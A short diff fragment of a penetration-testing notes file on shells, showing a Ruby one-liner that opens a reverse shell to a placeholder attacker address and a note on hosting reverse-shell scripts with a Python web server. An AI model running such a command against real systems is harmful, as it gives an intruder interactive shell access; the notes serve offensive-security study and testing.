Qazeer/InfoSec-Notes/General/Shells.md

 ruby -rsocket -e'f=TCPSocket.open("<IP>",<PORT>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
 ```

-#### In-memory injection
+#### Complete reverse shell scripts

-The scripts needs to be hosted on a webserver, which can be done using
+The scripts usually need to be uploaded on the target or hosted on a webserver,
-python:
+which can be done using python:

 ```python
 python -m SimpleHTTPServer <PORT>